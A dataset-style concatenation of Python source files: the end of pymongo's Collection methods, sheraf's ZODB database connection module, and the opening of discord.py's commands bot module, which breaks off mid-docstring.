def rename(self, new_name, **kwargs):
"""Rename this collection.
If operating in auth mode, client must be authorized as an
admin to perform this operation. Raises :class:`TypeError` if
`new_name` is not an instance of :class:`basestring`
(:class:`str` in python 3). Raises :class:`~pymongo.errors.InvalidName`
if `new_name` is not a valid collection name.
:Parameters:
- `new_name`: new name for this collection
- `**kwargs` (optional): additional arguments to the rename command
may be passed as keyword arguments to this helper method
(i.e. ``dropTarget=True``)
"""
if not isinstance(new_name, string_type):
raise TypeError("new_name must be an "
"instance of %s" % (string_type.__name__,))
if not new_name or ".." in new_name:
raise InvalidName("collection names cannot be empty")
if new_name[0] == "." or new_name[-1] == ".":
raise InvalidName("collecion names must not start or end with '.'")
if "$" in new_name and not new_name.startswith("oplog.$main"):
raise InvalidName("collection names must not contain '$'")
new_name = "%s.%s" % (self.__database.name, new_name)
cmd = SON([("renameCollection", self.__full_name), ("to", new_name)])
cmd.update(kwargs)
with self._socket_for_writes() as sock_info:
sock_info.command('admin', cmd)
def distinct(self, key, filter=None, **kwargs):
"""Get a list of distinct values for `key` among all documents
in this collection.
Raises :class:`TypeError` if `key` is not an instance of
:class:`basestring` (:class:`str` in python 3).
All optional distinct parameters should be passed as keyword arguments
to this method. Valid options include:
- `maxTimeMS` (int): The maximum amount of time to allow the count
command to run, in milliseconds.
The :meth:`distinct` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `key`: name of the field for which we want to get the distinct
values
- `filter` (optional): A query document that specifies the documents
from which to retrieve the distinct values.
- `**kwargs` (optional): See list of options above.
"""
if not isinstance(key, string_type):
raise TypeError("key must be an "
"instance of %s" % (string_type.__name__,))
cmd = SON([("distinct", self.__name),
("key", key)])
if filter is not None:
if "query" in kwargs:
raise ConfigurationError("can't pass both filter and query")
kwargs["query"] = filter
cmd.update(kwargs)
with self._socket_for_reads() as (sock_info, slave_ok):
return self._command(sock_info, cmd, slave_ok,
read_concern=self.read_concern)["values"]
def map_reduce(self, map, reduce, out, full_response=False, **kwargs):
"""Perform a map/reduce operation on this collection.
If `full_response` is ``False`` (default) returns a
:class:`~pymongo.collection.Collection` instance containing
the results of the operation. Otherwise, returns the full
response from the server to the `map reduce command`_.
:Parameters:
- `map`: map function (as a JavaScript string)
- `reduce`: reduce function (as a JavaScript string)
- `out`: output collection name or `out object` (dict). See
the `map reduce command`_ documentation for available options.
Note: `out` options are order sensitive. :class:`~bson.son.SON`
can be used to specify multiple options.
e.g. SON([('replace', <collection name>), ('db', <database name>)])
- `full_response` (optional): if ``True``, return full response to
this command - otherwise just return the result collection
- `**kwargs` (optional): additional arguments to the
`map reduce command`_ may be passed as keyword arguments to this
helper method, e.g.::
>>> db.test.map_reduce(map, reduce, "myresults", limit=2)
.. note:: The :meth:`map_reduce` method does **not** obey the
:attr:`read_preference` of this :class:`Collection`. To run
mapReduce on a secondary use the :meth:`inline_map_reduce` method
instead.
.. seealso:: :doc:`/examples/aggregation`
.. versionchanged:: 2.2
Removed deprecated arguments: merge_output and reduce_output
.. _map reduce command: http://docs.mongodb.org/manual/reference/command/mapReduce/
.. mongodoc:: mapreduce
"""
if not isinstance(out, (string_type, collections.Mapping)):
raise TypeError("'out' must be an instance of "
"%s or a mapping" % (string_type.__name__,))
cmd = SON([("mapreduce", self.__name),
("map", map),
("reduce", reduce),
("out", out)])
cmd.update(kwargs)
with self._socket_for_primary_reads() as (sock_info, slave_ok):
if (sock_info.max_wire_version >= 4 and 'readConcern' not in cmd and
'inline' in cmd['out']):
response = self._command(
sock_info, cmd, slave_ok, ReadPreference.PRIMARY,
read_concern=self.read_concern)
else:
response = self._command(
sock_info, cmd, slave_ok, ReadPreference.PRIMARY)
if full_response or not response.get('result'):
return response
elif isinstance(response['result'], dict):
dbase = response['result']['db']
coll = response['result']['collection']
return self.__database.client[dbase][coll]
else:
return self.__database[response["result"]]
def inline_map_reduce(self, map, reduce, full_response=False, **kwargs):
"""Perform an inline map/reduce operation on this collection.
Perform the map/reduce operation on the server in RAM. A result
collection is not created. The result set is returned as a list
of documents.
If `full_response` is ``False`` (default) returns the
result documents in a list. Otherwise, returns the full
response from the server to the `map reduce command`_.
The :meth:`inline_map_reduce` method obeys the :attr:`read_preference`
of this :class:`Collection`.
:Parameters:
- `map`: map function (as a JavaScript string)
- `reduce`: reduce function (as a JavaScript string)
- `full_response` (optional): if ``True``, return full response to
this command - otherwise just return the result collection
- `**kwargs` (optional): additional arguments to the
`map reduce command`_ may be passed as keyword arguments to this
helper method, e.g.::
>>> db.test.inline_map_reduce(map, reduce, limit=2)
"""
cmd = SON([("mapreduce", self.__name),
("map", map),
("reduce", reduce),
("out", {"inline": 1})])
cmd.update(kwargs)
with self._socket_for_reads() as (sock_info, slave_ok):
if sock_info.max_wire_version >= 4 and 'readConcern' not in cmd:
res = self._command(sock_info, cmd, slave_ok,
read_concern=self.read_concern)
else:
res = self._command(sock_info, cmd, slave_ok)
if full_response:
return res
else:
return res.get("results")
def __find_and_modify(self, filter, projection, sort, upsert=None,
return_document=ReturnDocument.BEFORE, **kwargs):
"""Internal findAndModify helper."""
common.validate_is_mapping("filter", filter)
if not isinstance(return_document, bool):
raise ValueError("return_document must be "
"ReturnDocument.BEFORE or ReturnDocument.AFTER")
cmd = SON([("findAndModify", self.__name),
("query", filter),
("new", return_document)])
cmd.update(kwargs)
if projection is not None:
cmd["fields"] = helpers._fields_list_to_dict(projection,
"projection")
if sort is not None:
cmd["sort"] = helpers._index_document(sort)
if upsert is not None:
common.validate_boolean("upsert", upsert)
cmd["upsert"] = upsert
with self._socket_for_writes() as sock_info:
if sock_info.max_wire_version >= 4 and 'writeConcern' not in cmd:
wc_doc = self.write_concern.document
if wc_doc:
cmd['writeConcern'] = wc_doc
out = self._command(sock_info, cmd,
read_preference=ReadPreference.PRIMARY,
allowable_errors=[_NO_OBJ_ERROR])
_check_write_command_response([(0, out)])
return out.get("value")
def find_one_and_delete(self, filter,
projection=None, sort=None, **kwargs):
"""Finds a single document and deletes it, returning the document.
>>> db.test.count({'x': 1})
2
>>> db.test.find_one_and_delete({'x': 1})
{u'x': 1, u'_id': ObjectId('54f4e12bfba5220aa4d6dee8')}
>>> db.test.count({'x': 1})
1
If multiple documents match *filter*, a *sort* can be applied.
>>> for doc in db.test.find({'x': 1}):
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> db.test.find_one_and_delete(
... {'x': 1}, sort=[('_id', pymongo.DESCENDING)])
{u'x': 1, u'_id': 2}
The *projection* option can be used to limit the fields returned.
>>> db.test.find_one_and_delete({'x': 1}, projection={'_id': False})
{u'x': 1}
:Parameters:
- `filter`: A query that matches the document to delete.
- `projection` (optional): a list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a mapping to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is deleted.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionadded:: 3.0
"""
kwargs['remove'] = True
return self.__find_and_modify(filter, projection, sort, **kwargs)
def find_one_and_replace(self, filter, replacement,
projection=None, sort=None, upsert=False,
return_document=ReturnDocument.BEFORE, **kwargs):
"""Finds a single document and replaces it, returning either the
original or the replaced document.
The :meth:`find_one_and_replace` method differs from
:meth:`find_one_and_update` by replacing the document matched by
*filter*, rather than modifying the existing document.
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> db.test.find_one_and_replace({'x': 1}, {'y': 1})
{u'x': 1, u'_id': 0}
>>> for doc in db.test.find({}):
... print(doc)
...
{u'y': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
:Parameters:
- `filter`: A query that matches the document to replace.
- `replacement`: The replacement document.
- `projection` (optional): A list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a mapping to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is replaced.
- `upsert` (optional): When ``True``, inserts a new document if no
document matches the query. Defaults to ``False``.
- `return_document`: If
:attr:`ReturnDocument.BEFORE` (the default),
returns the original document before it was replaced, or ``None``
if no document matches. If
:attr:`ReturnDocument.AFTER`, returns the replaced
or inserted document.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionadded:: 3.0
"""
common.validate_ok_for_replace(replacement)
kwargs['update'] = replacement
return self.__find_and_modify(filter, projection,
sort, upsert, return_document, **kwargs)
def find_one_and_update(self, filter, update,
projection=None, sort=None, upsert=False,
return_document=ReturnDocument.BEFORE, **kwargs):
"""Finds a single document and updates it, returning either the
original or the updated document.
>>> db.test.find_one_and_update(
... {'_id': 665}, {'$inc': {'count': 1}, '$set': {'done': True}})
{u'_id': 665, u'done': False, u'count': 25}}
By default :meth:`find_one_and_update` returns the original version of
the document before the update was applied. To return the updated
version of the document instead, use the *return_document* option.
>>> from pymongo import ReturnDocument
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... return_document=ReturnDocument.AFTER)
{u'_id': u'userid', u'seq': 1}
You can limit the fields returned with the *projection* option.
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... projection={'seq': True, '_id': False},
... return_document=ReturnDocument.AFTER)
{u'seq': 2}
The *upsert* option can be used to create the document if it doesn't
already exist.
>>> db.example.delete_many({}).deleted_count
1
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... projection={'seq': True, '_id': False},
... upsert=True,
... return_document=ReturnDocument.AFTER)
{u'seq': 1}
If multiple documents match *filter*, a *sort* can be applied.
>>> for doc in db.test.find({'done': True}):
... print(doc)
...
{u'_id': 665, u'done': True, u'result': {u'count': 26}}
{u'_id': 701, u'done': True, u'result': {u'count': 17}}
>>> db.test.find_one_and_update(
... {'done': True},
... {'$set': {'final': True}},
... sort=[('_id', pymongo.DESCENDING)])
{u'_id': 701, u'done': True, u'result': {u'count': 17}}
:Parameters:
- `filter`: A query that matches the document to update.
- `update`: The update operations to apply.
- `projection` (optional): A list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a dict to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is updated.
- `upsert` (optional): When ``True``, inserts a new document if no
document matches the query. Defaults to ``False``.
- `return_document`: If
:attr:`ReturnDocument.BEFORE` (the default),
returns the original document before it was updated, or ``None``
if no document matches. If
:attr:`ReturnDocument.AFTER`, returns the updated
or inserted document.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionadded:: 3.0
"""
common.validate_ok_for_update(update)
kwargs['update'] = update
return self.__find_and_modify(filter, projection,
sort, upsert, return_document, **kwargs)
def save(self, to_save, manipulate=True, check_keys=True, **kwargs):
"""Save a document in this collection.
**DEPRECATED** - Use :meth:`insert_one` or :meth:`replace_one` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("save is deprecated. Use insert_one or replace_one "
"instead", DeprecationWarning, stacklevel=2)
common.validate_is_document_type("to_save", to_save)
write_concern = None
if kwargs:
write_concern = WriteConcern(**kwargs)
with self._socket_for_writes() as sock_info:
if not (isinstance(to_save, RawBSONDocument) or "_id" in to_save):
return self._insert(sock_info, to_save, True,
check_keys, manipulate, write_concern)
else:
self._update(sock_info, {"_id": to_save["_id"]}, to_save, True,
check_keys, False, manipulate, write_concern)
return to_save.get("_id")
def insert(self, doc_or_docs, manipulate=True,
check_keys=True, continue_on_error=False, **kwargs):
"""Insert a document(s) into this collection.
**DEPRECATED** - Use :meth:`insert_one` or :meth:`insert_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("insert is deprecated. Use insert_one or insert_many "
"instead.", DeprecationWarning, stacklevel=2)
write_concern = None
if kwargs:
write_concern = WriteConcern(**kwargs)
with self._socket_for_writes() as sock_info:
return self._insert(sock_info, doc_or_docs, not continue_on_error,
check_keys, manipulate, write_concern)
def update(self, spec, document, upsert=False, manipulate=False,
multi=False, check_keys=True, **kwargs):
"""Update a document(s) in this collection.
**DEPRECATED** - Use :meth:`replace_one`, :meth:`update_one`, or
:meth:`update_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("update is deprecated. Use replace_one, update_one or "
"update_many instead.", DeprecationWarning, stacklevel=2)
common.validate_is_mapping("spec", spec)
common.validate_is_mapping("document", document)
if document:
# If a top level key begins with '$' this is a modify operation
# and we should skip key validation. It doesn't matter which key
# we check here. Passing a document with a mix of top level keys
# starting with and without a '$' is invalid and the server will
# raise an appropriate exception.
first = next(iter(document))
if first.startswith('$'):
check_keys = False
write_concern = None
if kwargs:
write_concern = WriteConcern(**kwargs)
with self._socket_for_writes() as sock_info:
return self._update(sock_info, spec, document, upsert,
check_keys, multi, manipulate, write_concern)
def remove(self, spec_or_id=None, multi=True, **kwargs):
"""Remove a document(s) from this collection.
**DEPRECATED** - Use :meth:`delete_one` or :meth:`delete_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("remove is deprecated. Use delete_one or delete_many "
"instead.", DeprecationWarning, stacklevel=2)
if spec_or_id is None:
spec_or_id = {}
if not isinstance(spec_or_id, collections.Mapping):
spec_or_id = {"_id": spec_or_id}
write_concern = None
if kwargs:
write_concern = WriteConcern(**kwargs)
with self._socket_for_writes() as sock_info:
return self._delete(sock_info, spec_or_id, multi, write_concern)
def find_and_modify(self, query={}, update=None,
upsert=False, sort=None, full_response=False,
manipulate=False, **kwargs):
"""Update and return an object.
**DEPRECATED** - Use :meth:`find_one_and_delete`,
:meth:`find_one_and_replace`, or :meth:`find_one_and_update` instead.
"""
warnings.warn("find_and_modify is deprecated, use find_one_and_delete"
", find_one_and_replace, or find_one_and_update instead",
DeprecationWarning, stacklevel=2)
if not update and not kwargs.get('remove', None):
raise ValueError("Must either update or remove")
if update and kwargs.get('remove', None):
raise ValueError("Can't do both update and remove")
# No need to include empty args
if query:
kwargs['query'] = query
if update:
kwargs['update'] = update
if upsert:
kwargs['upsert'] = upsert
if sort:
# Accept a list of tuples to match Cursor's sort parameter.
if isinstance(sort, list):
kwargs['sort'] = helpers._index_document(sort)
# Accept OrderedDict, SON, and dict with len == 1 so we
# don't break existing code already using find_and_modify.
elif (isinstance(sort, _ORDERED_TYPES) or
isinstance(sort, dict) and len(sort) == 1):
warnings.warn("Passing mapping types for `sort` is deprecated,"
" use a list of (key, direction) pairs instead",
DeprecationWarning, stacklevel=2)
kwargs['sort'] = sort
else:
raise TypeError("sort must be a list of (key, direction) "
"pairs, a dict of len 1, or an instance of "
"SON or OrderedDict")
fields = kwargs.pop("fields", None)
if fields is not None:
kwargs["fields"] = helpers._fields_list_to_dict(fields, "fields")
cmd = SON([("findAndModify", self.__name)])
cmd.update(kwargs)
with self._socket_for_writes() as sock_info:
if sock_info.max_wire_version >= 4 and 'writeConcern' not in cmd:
wc_doc = self.write_concern.document
if wc_doc:
cmd['writeConcern'] = wc_doc
out = self._command(sock_info, cmd,
read_preference=ReadPreference.PRIMARY,
allowable_errors=[_NO_OBJ_ERROR])
_check_write_command_response([(0, out)])
if not out['ok']:
if out["errmsg"] == _NO_OBJ_ERROR:
return None
else:
# Should never get here b/c of allowable_errors
raise ValueError("Unexpected Error: %s" % (out,))
if full_response:
return out
else:
document = out.get('value')
if manipulate:
document = self.__database._fix_outgoing(document, self)
return document
def __iter__(self):
return self
def __next__(self):
raise TypeError("'Collection' object is not iterable")
next = __next__
def __call__(self, *args, **kwargs):
"""This is only here so that some API misusages are easier to debug.
"""
if "." not in self.__name:
raise TypeError("'Collection' object is not callable. If you "
"meant to call the '%s' method on a 'Database' "
"object it is failing because no such method "
"exists." %
self.__name)
raise TypeError("'Collection' object is not callable. If you meant to "
"call the '%s' method on a 'Collection' object it is "
"failing because no such method exists." %
self.__name.split(".")[-1])
| 42.694197 | 91 | 0.58049 |
4ee41c96ec0c98673051bf2f3ed7cd9d587ad32a | 13,191 | py | Python | sheraf/databases.py | yaal-fr/sheraf | 9821a53d8b0ea0aba420175e4cfa81529262f88c | [
"MIT"
] | 1 | 2020-03-18T09:54:52.000Z | 2020-03-18T09:54:52.000Z | sheraf/databases.py | yaal-fr/sheraf | 9821a53d8b0ea0aba420175e4cfa81529262f88c | [
"MIT"
] | null | null | null | sheraf/databases.py | yaal-fr/sheraf | 9821a53d8b0ea0aba420175e4cfa81529262f88c | [
"MIT"
] | null | null | null | import contextlib
import os
import traceback
from contextvars import ContextVar
import transaction
import ZODB.config
import ZODB.DB
import zodburi
from ZODB.DemoStorage import DemoStorage
from sheraf.exceptions import ConnectionAlreadyOpened
# Isolated contexts state
global_context_connections_state = ContextVar("global_context_connections_state")
global_context_last_connection_state = ContextVar(
"global_context_last_connection_state"
)
class LocalData:
instance = None
def __init__(self, pid=None):
self.pid = pid or os.getpid()
self.databases = {}
self.last_database_context = {}
self.zodb_databases = {}
class GlobalThreadContext:
@property
def connections(self):
try:
return global_context_connections_state.get()
except LookupError:
global_context_connections_state.set([])
return global_context_connections_state.get()
@property
def last_connection_context(self):
try:
return global_context_last_connection_state.get()
except LookupError:
global_context_last_connection_state.set(None)
return global_context_last_connection_state.get()
@last_connection_context.setter
def last_connection_context(self, value):
global_context_last_connection_state.set(value)
def reset_connections_state(self):
global_context_connections_state.set([])
global_context_last_connection_state.set(None)
self.thread_context = GlobalThreadContext()
@classmethod
def get(cls):
# TODO: put a lock on pid
pid = os.getpid()
if not cls.instance or cls.instance.pid != pid:
cls.instance = LocalData(pid)
return cls.instance
# Isolated context state
database_context_connections_state = ContextVar("database_context_connections_state")
class Database(object):
"""A ZODB :class:`ZODB.DB` wrapper with a :class:`ZODB.interfaces.IStorage`
factory.
The storage factory will either create a
:class:`~ZEO.ClientStorage.ClientStorage`, a
:class:`~ZODB.FileStorage.FileStorage.FileStorage`, a
:class:`~ZODB.DemoStorage.DemoStorage`, a Relstorage
:class:`~relstorage.adapters.postgresql.adapter.PostgreSQLAdapter` or use a
user defined storage depending on the argument passed at the initialization
of the object.
A Storage object is created and pass it to the :class:`ZODB.DB` constructor
Several connections can be used at the same time. The connections are
identified by their name.
:param database_name: The name of the connection.
:param storage: If set, this user defined storage will be used.
:param uri: A zodburi to the database.
:type uri: An URI that will be parsed by :func:`zodburi.resolve_uri`.
:param db_args: Arguments to pass to the :class:`ZODB.DB`.
:param nestable: If `False`, will raise a
:class:`~sheraf.exceptions.ConnectionAlreadyOpened` if a connection has
already been opened.
"""
DEFAULT_DATABASE_NAME = "unnamed"
def __init__(self, uri=None, storage=None, nestable=False, db_args=None):
self.nestable = nestable
self.uri = uri
self.db = None
self.storage = None
self.db_args = db_args or {}
class DatabaseThreadContext:
@property
def connections(self):
try:
return database_context_connections_state.get()
except LookupError:
database_context_connections_state.set([])
return database_context_connections_state.get()
def reset_connections_state(self):
database_context_connections_state.set([])
self.thread_context = DatabaseThreadContext()
self.db_args["databases"] = LocalData.get().zodb_databases
self.reset(storage, uri)
stack = traceback.extract_stack()[-2]
LocalData.get().last_database_context[self.name] = (
stack.filename,
stack.lineno,
)
def __repr__(self):
description = "<Database database_name='{}'".format(self.name)
if self.db_args.get("read_only", False):
description += " ro"
if self.nestable:
description += " nestable"
description += ">"
return description
def reset(self, storage=None, uri=None):
"""Close and reopen a database connection."""
if self.db:
self.close()
if storage is not None:
self.storage = storage
elif uri:
storage_factory, db_args = zodburi.resolve_uri(uri)
self.storage = storage_factory()
db_args.update(self.db_args)
self.db_args = db_args
else:
self.storage = DemoStorage()
self.name = self.db_args.get("database_name", Database.DEFAULT_DATABASE_NAME)
if self.name in LocalData.get().databases:
last_context = LocalData.get().last_database_context.get(self.name)
raise KeyError(
"A database named '{}' already exists. Last opening was on {} at line {}".format(
self.name, last_context[0], last_context[1]
)
if last_context
else "A database named '{}' already exists.".format(self.name)
)
self.db = ZODB.DB(self.storage, **self.db_args)
LocalData.get().databases[self.name] = self
def connection_open(self):
"""Opens a connection. Returns a connection to this database.
If `nestable` is set and a connection has already been opened,
raises a :class:`~sheraf.exceptions.ConnectionAlreadyOpened` exception.
If `nestable` is False
and a connection has already been opened, it returns a new connection
with a new transaction_manager.
:return: A :class:`~ZODB.Connection.Connection` object.
"""
data = LocalData.get()
# No other connection exists
if not Database.last_connection():
connection = self.db.open()
# A connection to this database exists, and the second one is not allowed.
elif not self.nestable:
message = (
"First connection was {} on {} at line {}".format(
Database.last_connection(),
*data.thread_context.last_connection_context
)
if data.thread_context.last_connection_context
else "First connection was {}".format(Database.last_connection())
)
raise ConnectionAlreadyOpened(message)
# A connection to this database exists, and the second one is allowed, but
# with a new transaction manager.
else:
connection = self.db.open(
transaction_manager=transaction.TransactionManager()
)
self.thread_context.connections.append(connection)
data.thread_context.connections.append(connection)
return connection
def connection_close(self, connection=None):
"""Closes a connection opened on the database.
:param connection: The connection to close, if `None` the last
connection opened on the database is closed.
"""
connection = connection or Database.last_connection(self)
if connection.opened:
connection.close()
if connection in LocalData.get().thread_context.connections:
LocalData.get().thread_context.connections.remove(connection)
if connection in self.thread_context.connections:
self.thread_context.connections.remove(connection)
def close(self):
"""Closes the database."""
data = LocalData.get()
for connection in list(self.thread_context.connections):
if connection and connection.opened:
connection.close()
data.thread_context.connections.remove(connection)
self.thread_context.connections.remove(connection)
if self.db:
self.db.close()
if self.name in data.databases:
del data.databases[self.name]
if self.name in data.zodb_databases:
del data.zodb_databases[self.name]
if self.name in data.last_database_context:
del data.last_database_context[self.name]
self.db = None
self.storage = None
@contextlib.contextmanager
def connection(
self, commit=False, cache_minimize=False, reuse=False, _trackeback_shift=0
):
"""A context manager opening a connection on this database.
:param commit: Whether to commit the transaction when leaving the
context manager.
:type commit: boolean
:param cache_minimize: Whether to call
:func:`ZODB.Connection.Connection.cache_minimize` when leaving the
context manager.
:type cache_minimize: boolean
:param reuse: If a connection is already opened, reuse it.
:type reuse: boolean
>>> database = sheraf.Database()
>>> with database.connection() as connection:
... sheraf.Database.current_connection() is connection
True
"""
if reuse and Database.last_connection(self):
yield Database.last_connection(self)
return
_connection = self.connection_open()
if not self.nestable:
stack = traceback.extract_stack()[-3 - _trackeback_shift]
LocalData.get().thread_context.last_connection_context = (
stack.filename,
stack.lineno,
)
try:
yield _connection
if commit:
_connection.transaction_manager.commit()
except BaseException:
if commit and _connection.transaction_manager:
_connection.transaction_manager.abort()
raise
finally:
# TODO: to be changed with try/except NoTransaction when upgrading transaction>2.0 @cedric
if not commit and _connection.transaction_manager:
_connection.transaction_manager.abort()
if cache_minimize:
for conn in _connection.connections.values():
conn.cacheMinimize()
self.connection_close(_connection)
@classmethod
def last_connection(cls, database=None):
if database:
return (
database.thread_context.connections[-1]
if database.thread_context.connections
else None
)
return (
LocalData.get().thread_context.connections[-1]
if LocalData.get().thread_context.connections
else None
)
@classmethod
def current_connection(cls, database_name=None):
if not Database.last_connection():
return None
if not database_name:
return Database.last_connection()
return Database.last_connection().get_connection(database_name)
@classmethod
def current_name(cls):
if Database.last_connection():
return Database.last_connection().db().database_name
return None
@classmethod
def all(cls):
"""
:return: A list containing all the existing :class:`Database` in a
tuple `(name, Database)`.
"""
return LocalData.get().databases.items()
@classmethod
def get(cls, database_name=None):
"""
:param database_name: The name of the queried database.
:return: The database object if it exists. A :class:`KeyError` is raised elsewise.
"""
database_name = database_name or Database.DEFAULT_DATABASE_NAME
try:
return LocalData.get().databases[database_name]
except KeyError:
raise KeyError("No database named '{}'.".format(database_name))
@classmethod
def get_or_create(cls, **kwargs):
"""
:return: The database object if it exists. If the database does not exist, it is created with the `kwargs` arguments.
"""
try:
return Database.get(database_name=kwargs.get("database_name"))
except KeyError:
return Database(**kwargs)
@contextlib.contextmanager
def connection(database_name=None, commit=False, cache_minimize=False, reuse=False):
"""
Shortcut for :meth:`sheraf.databases.Database.connection`
:param database_name: The name of the database on which to open a connection.
If not set, the default database will be used.
:param *kwargs: See :meth:`sheraf.databases.Database.connection` arguments.
"""
database = Database.get(database_name)
with database.connection(
commit=commit,
cache_minimize=cache_minimize,
reuse=reuse,
_trackeback_shift=2,
) as conn:
yield conn
| 33.910026 | 125 | 0.627852 |
62f6c3e9d67d2ffec74359366959a98bb2427112 | 811 | py | Python | roles/osm2pgsql/templates/main.j2.py | cobra79/GeoGeekSuite | fc8e43a9e8dffa6b41b5b4671f674bee6f60785d | [
"Apache-2.0"
] | null | null | null | roles/osm2pgsql/templates/main.j2.py | cobra79/GeoGeekSuite | fc8e43a9e8dffa6b41b5b4671f674bee6f60785d | [
"Apache-2.0"
] | null | null | null | roles/osm2pgsql/templates/main.j2.py | cobra79/GeoGeekSuite | fc8e43a9e8dffa6b41b5b4671f674bee6f60785d | [
"Apache-2.0"
] | null | null | null | import cobra.helper.logging as logging
import cobra.tools.osm2pgsql as osm
from flask import Flask, request, jsonify
app = Flask(__name__)
l = logging.Logger('Osm2pgsql Flask')
l.debug('Start Cobra Logging')
#TODO: Schema handling
osm.Osm2PgSql(run_in_loop = True)
@app.route('/')
def hello_world():
l.debug('hello osm')
return 'Hello, osm!'
#@app.route('/load_shape', methods=['POST'])
#def load_shape():
# app.logger.info('load_shape')
# data = request.json
# g = cobra_gdal.cobra_gdal()
# try:
# app.logger.debug(data)
# #app.logger.info(f'{data['path']}')
# g.shape2pg(data.get('path'))
# except Exception as inst:
# app.logger.error(inst)
# finally:
# return jsonify(data)
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0') | 24.575758 | 44 | 0.649815 |
cba7d1e0ad8a18494f02f0bc44fe38a363db76b4 | 37,033 | py | Python | discord/ext/commands/bot.py | ToxicKidz/discord.py | bba4d6c4e4df418ba98d46a95c3f472a67a042b6 | [
"MIT"
] | 13 | 2020-12-16T06:13:11.000Z | 2021-04-15T12:01:38.000Z | discord/ext/commands/bot.py | ToxicKidz/discord.py | bba4d6c4e4df418ba98d46a95c3f472a67a042b6 | [
"MIT"
] | 1 | 2022-02-26T08:28:44.000Z | 2022-02-26T08:28:44.000Z | discord/ext/commands/bot.py | ToxicKidz/discord.py | bba4d6c4e4df418ba98d46a95c3f472a67a042b6 | [
"MIT"
] | 6 | 2020-12-16T00:01:24.000Z | 2021-02-05T12:32:54.000Z | """
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import asyncio
import collections
import inspect
import importlib.util
import sys
import traceback
import types
import discord
from .core import GroupMixin
from .view import StringView
from .context import Context
from . import errors
from .help import HelpCommand, DefaultHelpCommand
from .cog import Cog
__all__ = (
'when_mentioned',
'when_mentioned_or',
'Bot',
'AutoShardedBot',
)
def when_mentioned(bot, msg):
"""A callable that implements a command prefix equivalent to being mentioned.
These are meant to be passed into the :attr:`.Bot.command_prefix` attribute.
"""
return [f'<@{bot.user.id}> ', f'<@!{bot.user.id}> ']
def when_mentioned_or(*prefixes):
"""A callable that implements when mentioned or other prefixes provided.
These are meant to be passed into the :attr:`.Bot.command_prefix` attribute.
Example
--------
.. code-block:: python3
bot = commands.Bot(command_prefix=commands.when_mentioned_or('!'))
.. note::
This callable returns another callable, so if this is done inside a custom
callable, you must call the returned callable, for example:
.. code-block:: python3
async def get_prefix(bot, message):
extras = await prefixes_for(message.guild) # returns a list
return commands.when_mentioned_or(*extras)(bot, message)
See Also
----------
